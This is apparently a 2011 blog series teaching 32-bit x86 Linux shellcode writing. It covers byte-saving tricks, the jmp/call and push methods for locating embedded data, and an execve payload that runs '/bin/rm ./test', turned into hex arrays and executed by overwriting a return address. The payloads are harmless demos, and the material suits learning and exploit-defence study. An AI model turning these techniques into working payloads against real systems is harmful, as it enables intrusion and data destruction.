MicroMike: shell code

Oct 31, 2011

Shell code 6(reducing the shellcode size)

The size of shellcode is very important. Therefore I list some tricks that can reduce the shellcode size, and then rewrite our shellcode to make it smaller.

1.
Instead of movl $constant, %register, use xor, mul and lea. Moving a 32-bit constant into a register costs five bytes, while xor and mul on registers cost two bytes each and lea with an 8-bit displacement costs three. This can shrink the shellcode considerably.

The following is a quick example using the exit system call.
This is the original version that I wrote in the previous articles.

int main() {
  __asm__("movl $1, %eax;\
           movl $0, %ebx;\
           int $0x80;");
  return 0;
}

The size of each instruction is:

mov $1, %eax      => 5 bytes
mov $0, %ebx      => 5 bytes
int $0x80         => 2 bytes
------------------------------------
total                12 bytes

However, if we rewrite the shellcode as follows:

int main() {
  __asm__("xorl %ebx, %ebx;\
           leal 0x1(%ebx), %eax;\
           int $0x80;");
  return 0;
}

The size of the shellcode becomes:

xorl %ebx, %ebx      => 2 bytes
leal 0x1(%ebx), %eax => 3 bytes
int $0x80            => 2 bytes
--------------------------------------------
total                   7 bytes

Yes, that saves 5 bytes of shellcode. :D

Another example of reducing the shellcode:

int main(){
        __asm__("jmp 2f;                 # 2 bytes\n\
                 1:;\n\
                 popl %esi;              # 1 byte\n\
                 movl $4,%eax;           # 5 bytes\n\
                 movl $1,%ebx;           # 5 bytes\n\
                 movl $0x7,%edx;         # 5 bytes\n\
                 movl %esi,%ecx;         # 2 bytes\n\
                 int  $0x80;             # 2 bytes\n\
                 movl $1,%eax;           # 5 bytes\n\
                 movl $0,%ebx;           # 5 bytes\n\
                 int  $0x80;             # 2 bytes\n\
                 2:;\n\
                 call 1b;                # 5 bytes\n\
                 .string \"Run Han\";    # 7 bytes (+1 for the NUL)\n\
                 ");
        return 0;
}

This code is the write system call example that I wrote in a previous article.

This shellcode is 46 bytes long, not counting the NUL that .string appends.

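Rewrite the shellcode:

int main(){
        __asm__("jmp 2f;                 # 2 bytes\n\
                 1:;\n\
                 popl %ecx;              # 1 byte\n\
                 xorl %ebx, %ebx;        # 2 bytes\n\
                 mul  %ebx;              # 2 bytes\n\
                 inc  %ebx;              # 1 byte\n\
                 leal 0x4(%eax),%eax;    # 3 bytes\n\
                 leal 0x7(%edx),%edx;    # 3 bytes\n\
                 int  $0x80;             # 2 bytes\n\
                 xorl %ebx, %ebx;        # 2 bytes\n\
                 leal 0x1(%ebx), %eax;   # 3 bytes\n\
                 int  $0x80;             # 2 bytes\n\
                 2:;\n\
                 call 1b;                # 5 bytes\n\
                 .string \"Run Han\";    # 7 bytes (+1 for the NUL)\n\
                 ");
        return 0;
}

The code size is reduced to 35 bytes. The inc %ebx costs one byte and sets the file descriptor to 1 (stdout), which the original did with movl $1,%ebx; without it the write would go to file descriptor 0.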

P.S. mul %ebx multiplies %eax by %ebx and stores the 64-bit result in %edx:%eax. Since %ebx is zero here, both %eax and %edx are set to zero.

2.
The push trick and the relative jmp/call trick can both get the address of the data, but under the right conditions the push trick saves some bytes.
Consider the following example from Shell code 4:

int main(){
        /* relative jmp/call trick */
        __asm__("jmp 2f;\n\
                 1:;\n\
                 pop %esi;\n\
                 movl %esi, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .long 0x00000002,0x0;\n\
                 ");
        return 0;
}

The above code is 42 bytes.

int main(){
        /* push trick */
        __asm__("push $0;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 ");
        return 0;
}

The code size is 30 bytes.
By using the push trick, we saved 12 bytes of shellcode. Nice!!!

3.
The 0x66 prefix or 16-bit/8-bit mov instructions.
If the constant is no larger than 0xffff, use the 0x66 operand-size prefix, which is the movw instruction in the GNU assembler. This saves one byte compared with movl.
If the constant is no larger than 0xff, use the movb instruction, since it costs only two bytes.
Note that movw and movb write only the low 16 or 8 bits of the register, so the upper bits must already be zero.
Rewrite the previous example:

int main(){
        /* push trick */
        __asm__("xorl %eax, %eax;\n\
                 pushl %eax;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 xorl %ecx, %ecx;\n\
                 movb $162, %al;\n\
                 int  $0x80;\n\
                 xorl %ebx, %ebx;\n\
                 leal 0x1(%ebx), %eax;\n\
                 int  $0x80;\n\
                 ");
        return 0;
}

The size of the above code is reduced to 20 bytes, which is 10 bytes fewer than before. (The xorl %eax, %eax and pushl %eax pair replaces push $0 at the cost of one extra byte, so that the upper bits of %eax are zero before movb writes %al.)
Now the nanosleep and exit system calls cost only 20 bytes instead of 42.

These tricks are very useful in some situations. Enjoy. :D

Jul 4, 2011

Shell code 5(execve system call)

This article is mainly based on the paper "Smashing the Stack for Fun and Profit".
This time I'll use the execve system call to remove a file called "test".
Before starting, let's see how execve works in C.
From the man page of execve:

#include <unistd.h>
       int execve(const char *filename, char *const argv[],
                  char *const envp[]);

As you can see, the execve system call takes three parameters.
1. filename is the file you want to execute.
2. argv is an array of argument strings passed to the new program.
3. envp is not important for our shellcode, so I will not explain it in detail.
Let's write a simple C program which uses the execve system call.
execve_pre.c

#include <unistd.h>
int main(){
        char *argv[]={"/bin/rm","./test",NULL};
        execve(argv[0],argv,NULL);
        return 0;
}

Compile the program and run it with the following commands.

1. gcc -o exe.out execve_pre.c

2. touch test

P.S. the touch command creates an empty file.

3. ./exe.out

You will see that the file "test" has been removed.

Now turn this into the inline assembly.

execve.c

char *argv[]={"/bin/rm","./test",NULL};
int main(){
        __asm__("movl $0xb,%eax;\
                 movl argv,%ebx;\
                 movl $argv,%ecx;\
                 movl $0,%edx;\
                 int $0x80;\
                 movl $0x1,%eax;\
                 movl $0x0,%ebx;\
                 int $0x80;\
                 ");
        return 0;
}

Compile and execute it.

The result is the same as the previous example.

However, as I mentioned before, I don't want the data to live outside the shellcode.

Therefore, I need to put the data inside the shellcode.

I get the address of the data the same way as before, with the relative jmp/call trick.

The code looks like this:

execve2.c

int main(){
        __asm__("jmp 2f;\n\
                 1:;\n\
                 xor %eax,%eax;\n\
                 popl %esi;\n\
                 movl %esi,%ebx;\n\
                 leal 0x8(%esi),%esi;\n\
                 pushl %eax;\n\
                 pushl %esi;\n\
                 pushl %ebx;\n\
                 movl $0xb,%eax;\n\
                 movl %esp,%ecx;\n\
                 xorl %edx,%edx;\n\
                 int $0x80;\n\
                 movl $0x1,%eax;\n\
                 movl $0x0,%ebx;\n\
                 int $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .string \"/bin/rm\";\n\
                 .string \"./test\";\n\
                 .byte 0x0,0x0,0x0,0x0;\n\
                 ");
        return 0;
}

In order to create a structure like

char *argv[]={"/bin/rm","./test",NULL};

I use the stack to store the data.
1. Get the address of "/bin/rm" with the relative jmp/call trick and pop it into %esi.
2. Copy the content of %esi to %ebx.
3. leal 0x8(%esi), %esi => %esi += 8;
After this instruction, %esi points to "./test", because "/bin/rm" plus its terminating NUL is 8 bytes long.
4. Push 0, the address of "./test" and the address of "/bin/rm".
P.S. since the stack grows down, push the parameters in reverse order. The memory layout is shown in figure 1.

<figure 1>

low address ------------------------------------------ high address

| address of "/bin/rm" | address of "./test" | NULL  |
| pushed from %ebx     | pushed from %esi    | %eax  |

After the above steps, I can move the parameters into the registers that int $0x80 needs.

1. Since %ebx already contains the address of "/bin/rm", there is no need to set it again. This is the first argument, argv[0], of execve(argv[0],argv,NULL).

2. movl %esp,%ecx;

stores the address of the structure in %ecx. This is the second argument, argv, of execve(argv[0],argv,NULL).

3. xorl %edx, %edx;

stores the NULL pointer in %edx. This is the third argument, NULL, of execve(argv[0],argv,NULL).

And now it's time to compile the source code and execute it.

Use objdump to dump the machine code and copy it into a new source file. (If you have no idea how to use it, see the previous shell code posts.)

execve3.c

/* This is the shellcode */
char shellcode[] =
"\xeb\x22"
"\x31\xc0"
"\x5e"
"\x89\xf3"
"\x8d\x76\x08"
"\x50"
"\x56"
"\x53"
"\xb8\x0b\x00\x00\x00"
"\x89\xe1"
"\x31\xd2"
"\xcd\x80"
"\xb8\x01\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xcd\x80"
"\xe8\xd9\xff\xff\xff"
"/bin/rm\x0"
"./test\x0"
"\x00\x00\x00\x00";

void main() {
   int *ret;
   /* overflow the return address */
   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;
}

Compile the source code, use execstack to enable the executable stack and execute it. You will see that the result is what we expected.

The execve system call is actually very dangerous. The example above only uses /bin/rm to remove a file, but if someone uses /bin/sh to spawn a new shell, the consequences are unpredictable.

After verifying the result, let's now combine all the code together.

All.c

/* 
 * The inline assembly mix all the code together.
 * It will print a message,
 * wait 2 seconds and
 * remove a file called test.
 */
int main(){
        __asm__("jmp 2f;\n\
                 1:;\n\
                 popl %esi;\n\
                 movl %esi, %ecx;\n\
                 xorl %ebx, %ebx;\n\
                 mul %ebx;\n\
                 inc %ebx;\n\
                 movb $0x4, %al;\n\
                 movb $0x8, %dl;\n\
                 int  $0x80;\n\
                 xorl %eax, %eax;\n\
                 pushl %eax;\n\
                 movb $0x2, %al;\n\
                 pushl %eax;\n\
                 movl %esp, %ebx;\n\
                 xor %ecx, %ecx;\n\
                 movb $0xa2, %al;\n\
                 int  $0x80;\n\
                 xorl %eax, %eax;\n\
                 leal 0x9(%esi),%esi;\n\
                 pushl %eax;\n\
                 movl %esi, %ebx;\n\
                 leal 0x8(%esi), %esi;\n\
                 pushl %esi;\n\
                 pushl %ebx;\n\
                 movb $0xb, %al;\n\
                 movl %esp, %ecx;\n\
                 xor %edx, %edx;\n\
                 int $0x80;\n\
                 xorl %ebx, %ebx;\n\
                 leal 0x1(%ebx), %eax;\n\
                 int $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .string \"Run Han!\"\n\
                 .string \"/bin/rm\";\n\
                 .string \"./test\";\n\
                 .long 0x0;\n\
                ");
        return 0;
}

There is not much to say about the source code. I use some instructions that reduce the code size; I will talk about reducing the code size in the next article.

And now compile the source code and use objdump to generate the shellcode.

All_shell.c

char shellcode[] =
"\xeb\x39"      /*relative jmp*/
"\x5e"          /*pop %esi*/
"\x89\xf1"      /*movl %esi, %ecx*/
"\x31\xdb"      /*xor %ebx, %ebx*/
"\xf7\xe3"      /*mul %ebx*/
"\x43"          /*inc %ebx*/
"\xb0\x04"      /*mov $0x4, %al*/
"\xb2\x08"      /*mov $0x8, %dl*/
"\xcd\x80"      /*int $0x80*/
"\x31\xc0"      /*xor %eax, %eax*/
"\x50"          /*pushl %eax*/
"\xb0\x02"      /*movb $2, %al*/
"\x50"          /*pushl %eax*/
"\x89\xe3"      /*movl %esp, %ebx*/
"\x31\xc9"      /*xor %ecx, %ecx*/
"\xb0\xa2"      /*mov $0xa2, %al*/
"\xcd\x80"      /*int $0x80*/
"\x31\xc0"      /*xor %eax, %eax*/
"\x8d\x76\x09"  /*leal 0x09(%esi),%esi*/
"\x50"          /*push %eax*/
"\x89\xf3"      /*mov %esi, %ebx*/
"\x8d\x76\x08"  /*lea 0x8(%esi), %esi*/
"\x56"          /*push %esi*/
"\x53"          /*push %ebx*/
"\xb0\x0b"      /*mov $0xb, %al*/
"\x89\xe1"      /*mov %esp, %ecx*/
"\x8d\x51\x04"  /*lea 0x4(%ecx), %edx (All.c uses xor %edx, %edx here)*/
"\xcd\x80"      /*int $0x80*/
"\x31\xdb"      /*xor %ebx, %ebx*/
"\x8d\x43\x01"  /*lea 0x1(%ebx), %eax*/
"\xcd\x80"      /*int $0x80*/
"\xe8\xc2\xff\xff\xff"  /*relative call*/
"Run Han!\x0"
"/bin/rm\x0"
"./test\x0"
"\x00\x00\x00\x00";

void main() {
   int *ret;
   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}

Compile it, use execstack to enable the executable stack and execute it. You will see the program first print a message, wait about two seconds and then remove a file called "test".

Jul 2, 2011

Shell code 4(another trick)

So far, the shellcode can print a message and exit the program normally.
Now I add a new feature to the previous shellcode program: let the program wait 2 seconds and then exit.

In order to do this, I need a new system call called "nanosleep". (My OS is Ubuntu 10.10.)
Use the following command to see what nanosleep does:
man nanosleep

#include <time.h>
int nanosleep(const struct timespec *req, struct timespec *rem);
....
struct timespec {
               time_t tv_sec;        /* seconds */
               long   tv_nsec;       /* nanoseconds */
           };

P.S. I wrote a simple program to check the size of timespec and of each of its fields. On my system the time_t type is 4 bytes and long is 4 bytes, so timespec is 8 bytes long in total.
Tip: you can write a C program that uses the sizeof operator to see the size of each type.
That is all the information I need.

Now, as usual, write an inline assembly program.
sleep1.c

/* the timespec structure: tv_sec = 2, tv_nsec = 0 */
char t1_v[]="\x02\x00\x00\x00\x00\x00\x00\x00";
int main(){
        __asm__("movl $t1_v, %ebx;\
                 movl $0, %ecx;\
                 movl $162, %eax;\
                 int  $0x80;\
                 movl $1,%eax;\
                 movl $0,%ebx;\
                 int  $0x80;\
                 ");
        return 0;
}

Compile the source code and execute it. You will see that the program waits about 2 seconds and then exits.
However, just like in the previous post, Shell code 3(cont.), I don't want the data to be outside the shellcode. Therefore, I use the same relative jmp/call trick mentioned in that post.
sleep2.c

int main(){
        /* relative jmp/call trick */
        __asm__("jmp 2f;\n\
                 1:;\n\
                 pop %esi;\n\
                 movl %esi, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .long 0x00000002,0x0;\n\
                 ");
        return 0;
}

Compile the source code and test the result. (It works :D )

Besides the relative jmp/call trick, is there any other way to get the address of the data?
Why not just push the parameters onto the stack? Then %esp will contain the address of our data. Let's use this push trick to write our code.
sleep3.c

int main(){
        /* push trick */
        __asm__("push $0;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 ");
        return 0;
}

P.S. remember that the stack grows down, so push the data in reverse order.
Before writing the shellcode, I add the write system call to the inline assembly.
sleep4.c

/*
 * In this example I use both the 
 * relative jmp/call trick and
 * push trick to get the data.
 */
int main(){
        __asm__("jmp 2f;\n\
                 1:;\n\
                 popl %esi;\n\
                 movl $4,%eax;\n\
                 movl $1,%ebx;\n\
                 movl $0x7,%edx;\n\
                 movl %esi,%ecx;\n\
                 int  $0x80;\n\
                 push $0;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .string \"Run Han\";\n\
                ");
        return 0;
}

This is what the inline assembly looks like; it is pretty big now.

Again, compile the source code and test the result. If everything is correct, the program prints the message, waits about 2 seconds and then exits.
If everything works fine, run objdump on the binary.

Copy the machine code and paste it into another source file as the shellcode.
sleep5.c
/* This is the shellcode */
char shellcode[]=
"\xeb\x32"
"\x5e"
"\xb8\x04\x00\x00\x00"
"\xbb\x01\x00\x00\x00"
"\xba\x07\x00\x00\x00"
"\x89\xf1"
"\xcd\x80"
"\x6a\x00"
"\x6a\x02"
"\x89\xe3"
"\xb9\x00\x00\x00\x00"
"\xb8\xa2\x00\x00\x00"
"\xcd\x80"
"\xb8\x01\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xcd\x80"
"\xe8\xc9\xff\xff\xff"
"Run Han";
int main(){
        int *ptr;
        int i;
        /* 
         * overflow the return address
         * transfer the execution flow to shellcode
         */
        for(i=0;i<10;i++){
                ptr = (int*)&ptr+i;
                *(ptr) = (int)shellcode;
        }
        return 0;
}

Compile the source code and use execstack to enable the executable stack.
gcc -g -o sleep5.out sleep5.c
execstack -s sleep5.out
Execute the program and check that the result is what we expected.
Moreover, you can even use gdb to inspect the result.

Reference website: http://www.governmentsecurity.org/forum/topic/19441-reduce-shellcode-by-4-bytes/
